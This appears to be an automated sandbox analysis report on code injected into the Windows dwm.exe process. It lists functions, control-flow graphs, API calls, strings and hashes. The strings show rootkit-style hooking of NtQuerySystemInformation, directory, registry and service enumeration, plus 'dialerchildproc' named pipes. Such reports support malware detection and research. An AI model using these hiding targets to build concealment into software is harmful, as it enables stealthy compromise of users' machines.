210918e2d5a-210918e2d64 606->616 617 210918e2d7b-210918e2d8d call 210918e3844 606->617 618 210918e2de6-210918e2dec 608->618 609->610 629 210918e2e4a-210918e2e55 609->629 612 210918e2e14-210918e2e1e 610->612 613 210918e2e35-210918e2e3f call 210918e3844 610->613 620 210918e2cf9-210918e2cfe 611->620 611->621 612->613 622 210918e2e20-210918e2e33 call 210918e152c 612->622 623 210918e2e42-210918e2e44 613->623 614->621 624 210918e2d33-210918e2d38 614->624 616->617 627 210918e2d66-210918e2d79 call 210918e152c 616->627 617->621 617->623 628 210918e2dee-210918e2df3 618->628 618->629 620->596 620->611 621->623 622->613 622->629 623->589 623->629 624->598 624->614 627->617 627->621 628->601 628->618 634 210918e2ecc-210918e2ed0 629->634 635 210918e2e57-210918e2e5b 629->635 634->589 639 210918e2e5d-210918e2e61 635->639 640 210918e2e63-210918e2e7d call 210918e85c0 635->640 639->640 642 210918e2e80-210918e2e83 639->642 640->642 645 210918e2ea6-210918e2ea9 642->645 646 210918e2e85-210918e2ea3 call 210918e85c0 642->646 645->634 648 210918e2eab-210918e2ec9 call 210918e85c0 645->648 646->645 648->634
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction ID: 9155085d533a504f65c5f35ea89260bdb927ab6c0aa4a3258e1fe780f416618f
                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction Fuzzy Hash: ECB1E232310A6582EB64AF25C4A87EA63A6F764FA4F445016EE095B797DFB5CCC0D340
                                                          Function 00000210918E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction ID: b3bc28a550d7cdcaab25d612ffe6b147d1824fc84d8c4ad359801921f32edbe4
                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction Fuzzy Hash: 1631C572304B8089EB60DF60E8983EE7360F794B14F444129DB4D5BB99EF78C989D750
                                                          Function 00000210918ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction ID: 2f221f08e20402e551b539643ded67e74f9e09e1a296471545a2a9af573efade
                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction Fuzzy Hash: 9331B332314B8085EB60DF25E8943DE73A0F799B64F500225EA9D4BB55EF78C996CB40
                                                          Function 00000210918E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction ID: 2d7b6ccb89d2cba27204a6c14ab94c154e81757cc5cfae08388b0b1e3cedb0bc
                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction Fuzzy Hash: 39518E72300B8486EB50DF62E4A839B77A1F398FA9F544124DE4A0B75AEF7CC486D740
                                                          Function 00000210918E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                          • API String ID: 4175298099-1975688563
                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction ID: 6197689def48816bad0859d6c6d5319777dc6a8f413462ecbc9a9746b5a67cee
                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction Fuzzy Hash: 0A31A67470094AA0EF04EFA5E8F97D62321B774F64F805113950A0A2679FF88ECAE391
                                                          Function 0000021091CF6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 407 21091cf6910-21091cf6916 408 21091cf6918-21091cf691b 407->408 409 21091cf6951-21091cf695b 407->409 411 21091cf691d-21091cf6920 408->411 412 21091cf6945-21091cf6984 call 21091cf6fc0 408->412 410 21091cf6a78-21091cf6a8d 409->410 413 21091cf6a8f 410->413 414 21091cf6a9c-21091cf6ab6 call 21091cf6e54 410->414 416 21091cf6938 __scrt_dllmain_crt_thread_attach 411->416 417 21091cf6922-21091cf6925 411->417 430 21091cf698a-21091cf699f call 21091cf6e54 412->430 431 21091cf6a52 412->431 420 21091cf6a91-21091cf6a9b 413->420 428 21091cf6aef-21091cf6b20 call 21091cf7190 414->428 429 21091cf6ab8-21091cf6aed call 21091cf6f7c call 21091cf6e1c call 21091cf7318 call 21091cf7130 call 21091cf7154 call 21091cf6fac 414->429 422 21091cf693d-21091cf6944 416->422 418 21091cf6927-21091cf6930 417->418 419 21091cf6931-21091cf6936 call 21091cf6f04 417->419 419->422 439 21091cf6b22-21091cf6b28 428->439 440 21091cf6b31-21091cf6b37 428->440 429->420 442 21091cf6a6a-21091cf6a77 call 21091cf7190 430->442 443 21091cf69a5-21091cf69b6 call 21091cf6ec4 430->443 434 21091cf6a54-21091cf6a69 431->434 439->440 444 21091cf6b2a-21091cf6b2c 439->444 445 21091cf6b7e-21091cf6b94 call 21091cf268c 440->445 446 21091cf6b39-21091cf6b43 440->446 442->410 457 21091cf69b8-21091cf69dc call 21091cf72dc call 21091cf6e0c call 21091cf6e38 call 21091cfac0c 443->457 458 21091cf6a07-21091cf6a11 call 21091cf7130 443->458 452 21091cf6c1f-21091cf6c2c 444->452 464 21091cf6bcc-21091cf6bce 445->464 465 21091cf6b96-21091cf6b98 445->465 453 21091cf6b4f-21091cf6b5d call 21091d05780 446->453 454 21091cf6b45-21091cf6b4d 446->454 460 21091cf6b63-21091cf6b78 call 21091cf6910 453->460 475 21091cf6c15-21091cf6c1d 453->475 454->460 457->458 510 21091cf69de-21091cf69e5 __scrt_dllmain_after_initialize_c 457->510 458->431 478 21091cf6a13-21091cf6a1f call 21091cf7180 458->478 460->445 460->475 473 21091cf6bd5-21091cf6bea call 21091cf6910 464->473 474 21091cf6bd0-21091cf6bd3 464->474 465->464 472 21091cf6b9a-21091cf6bbc call 21091cf268c call 21091cf6a78 465->472 472->464 504 21091cf6bbe-21091cf6bc6 call 21091d05780 472->504 473->475 489 21091cf6bec-21091cf6bf6 473->489 474->473 474->475 475->452 497 21091cf6a45-21091cf6a50 478->497 498 21091cf6a21-21091cf6a2b call 21091cf7098 478->498 494 21091cf6bf8-21091cf6bff 489->494 495 21091cf6c01-21091cf6c11 call 21091d05780 489->495 494->475 495->475 497->434 498->497 509 21091cf6a2d-21091cf6a3b 498->509 504->464 509->497 510->458 511 21091cf69e7-21091cf6a04 call 21091cfabc8 510->511 511->458
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                          • API String ID: 190073905-1786718095
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 251b2eb000b77e588726be858319372c079c124fe55e5d510e73ca85a71b0a44
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 1A81F3B17052E985FA54BB6694F93D922A2EBB5FA0F948014B94443797DBF8CCCB8300
                                                          Function 00000210918ECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 514 210918ece28-210918ece4a call 210918f6080 517 210918ece4c-210918ece57 FlsGetValue 514->517 518 210918ece69-210918ece74 FlsSetValue 514->518 519 210918ece59-210918ece61 517->519 520 210918ece63 517->520 521 210918ece7b-210918ece80 518->521 522 210918ece76-210918ece79 518->522 523 210918eced5-210918ecee0 SetLastError 519->523 520->518 524 210918ece85 call 210918ed6cc 521->524 522->523 525 210918ecef5-210918ecf0b call 210918ec748 523->525 526 210918ecee2-210918ecef4 523->526 527 210918ece8a-210918ece96 524->527 538 210918ecf0d-210918ecf18 FlsGetValue 525->538 539 210918ecf28-210918ecf33 FlsSetValue 525->539 529 210918ecea8-210918eceb2 FlsSetValue 527->529 530 210918ece98-210918ece9f FlsSetValue 527->530 533 210918ecec6-210918eced0 call 210918ecb94 call 210918ed744 529->533 534 210918eceb4-210918ecec4 FlsSetValue 529->534 532 210918ecea1-210918ecea6 call 210918ed744 530->532 532->522 533->523 534->532 543 210918ecf1a-210918ecf1e 538->543 544 210918ecf22 538->544 545 210918ecf98-210918ecf9f call 210918ec748 539->545 546 210918ecf35-210918ecf3a 539->546 543->545 548 210918ecf20 543->548 544->539 549 210918ecf3f call 210918ed6cc 546->549 551 210918ecf8f-210918ecf97 548->551 552 210918ecf44-210918ecf50 549->552 553 210918ecf62-210918ecf6c FlsSetValue 552->553 554 210918ecf52-210918ecf59 FlsSetValue 552->554 555 210918ecf6e-210918ecf7e FlsSetValue 553->555 556 210918ecf80-210918ecf88 call 210918ecb94 553->556 557 210918ecf5b-210918ecf60 call 210918ed744 554->557 555->557 556->551 562 210918ecf8a call 210918ed744 556->562 557->545 562->551
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 00000210918ECE37
                                                          • FlsGetValue.KERNEL32(?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECE4C
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECE6D
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECE9A
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECEAB
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECEBC
                                                          • SetLastError.KERNEL32 ref: 00000210918ECED7
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECF0D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000210918EECCC,?,?,?,?,00000210918EBF9F,?,?,?,?,?,00000210918E7AB0), ref: 00000210918ECF2C
                                                            • Part of subcall function 00000210918ED6CC: HeapAlloc.KERNEL32 ref: 00000210918ED721
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECF54
                                                            • Part of subcall function 00000210918ED744: HeapFree.KERNEL32 ref: 00000210918ED75A
                                                            • Part of subcall function 00000210918ED744: GetLastError.KERNEL32 ref: 00000210918ED764
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECF65
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000210918F0A6B,?,?,?,00000210918F045C,?,?,?,00000210918EC84F), ref: 00000210918ECF76
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction ID: d010a186ccf38d7d0ef1cd70070bd84eb2c11d1f49c709c5af1709e23b372e48
                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction Fuzzy Hash: 2A414B3074128542FA68B77599FD3EB22925BB5FB4F144724A8360E6E7DBF89CC1A600
                                                          Function 00000210918E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2171963597-1373409510
                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction ID: 445b340b846f50d432ea8f221a814d5e6158a4dd1aabc4a4eb5b41dd834adc60
                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction Fuzzy Hash: 5821607271464082EB10DB24E49839A73A1F799BA4F600315DA5906BA9CFBCC989DB40
                                                          Function 0000021091CF9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665347309.0000021091CF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091CF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_21091cf0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction ID: 0808526ecf160521c4791c6983e52335e94262145bbf6eaab2e7c5031938b908
                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction Fuzzy Hash: 77E1ACB2700B888AEF609F25D4993DD77A2F765FA8F100115EE8957B9ACB74C8D2C700
                                                          Function 00000210918EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction ID: a29e0ef8d8ea574df21b5f6fdb74ba3a40dfb9769ef4301c74ba3a13f1b59ded
                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction Fuzzy Hash: 44E17E72B0474096EB20EF6594D83DE77A0F765FA8F100516EE8A5BB56CBB4C8C1DB00
                                                          Function 00000210918EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction ID: 1fa4a623ebf3e56b2ce7af07f2c6025fa9012c01e52e8150ca3e8251a842d4d4
                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction Fuzzy Hash: 14410532311A0081FA15EB56A8E87E73391B769FB4F5441259D0E8F786EFB8CCC6A340
                                                          Function 00000210918E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction ID: 5917e03bb0dc98597700a01bec16f3c65054b068df6d68457e3caebffa23cbfc
                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction Fuzzy Hash: E6416F73214B84C6E760DF21E49879B77A1F398F98F548129DA8A0B759DF78C885CB40
                                                          Function 00000210918ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00000210918EC7DE,?,?,?,?,?,?,?,?,00000210918ECF9D,?,?,00000001), ref: 00000210918ED087
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918EC7DE,?,?,?,?,?,?,?,?,00000210918ECF9D,?,?,00000001), ref: 00000210918ED0A6
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918EC7DE,?,?,?,?,?,?,?,?,00000210918ECF9D,?,?,00000001), ref: 00000210918ED0CE
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918EC7DE,?,?,?,?,?,?,?,?,00000210918ECF9D,?,?,00000001), ref: 00000210918ED0DF
                                                          • FlsSetValue.KERNEL32(?,?,?,00000210918EC7DE,?,?,?,?,?,?,?,?,00000210918ECF9D,?,?,00000001), ref: 00000210918ED0F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction ID: 0ddf34ffb7a6bc03c15f229e9b8506aac471d15973571c351d4b1eac498137bd
                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction Fuzzy Hash: 72114C3070468442FA68B73559FD3FB61515BA5FF4F185324A83A0E6EBDEB8CCC6A600
                                                          Function 00000210918E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 26744a45c67a15ae7a491ed9dd556b84148c13b2f2136c0e16bb0646e6cc3475
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 3881E37170064186FB50BB65A8FD3DB2390A7B5FA4F544425AA054F7A7DBF8CCC2A780
                                                          Function 00000210918E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction ID: 2d96f2738731fe704152383203b8890506cee804f7f6c28f4b0e38ec4f968fea
                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction Fuzzy Hash: 5931C631712B41E1EE15EB42A4A87DA2394B768FB0F690E259E1D0F392DFF9C9C59310
                                                          Function 00000210918F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction ID: 055d461e7a8e08ee720fb6e1d84fc304e1a07e29634d749364a6ac13f5c8fe39
                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction Fuzzy Hash: EF11B971310B4082E7508B12F8A835673A0F798FF4F540324ED1A8B795CFB8CC958784
                                                          Function 00000210918E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction ID: cb63e3a9e7f71ff03d01422f27ecb70b19ab684b397dc1d16e8f43a88e42092a
                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction Fuzzy Hash: 19319532701B5182EB25EF16D5A87AB67A1FB64FA4F0841209E484BB57EF74CCE19740
                                                          Function 00000210918ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction ID: 8b8b9c043bbe9cccc78c772b3a056e780b70ee12ddd96c376506eae7d2449856
                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction Fuzzy Hash: 0811083070568082FA64B73155FD3AA62526BB9FF4F144724A8364A6E7DAF8CCC6A600
                                                          Function 00000210918E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.2665144011.00000210918E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_210918e0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction ID: a34e4c54b6f8a4bc75b793de4ff4f744825fe581586ebc2376466305cd852a47
                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction Fuzzy Hash: 46016D71300A4082EB60DB52A4AC79A63A1F798FD4F984135DE4A47756DF7CCDCAC740
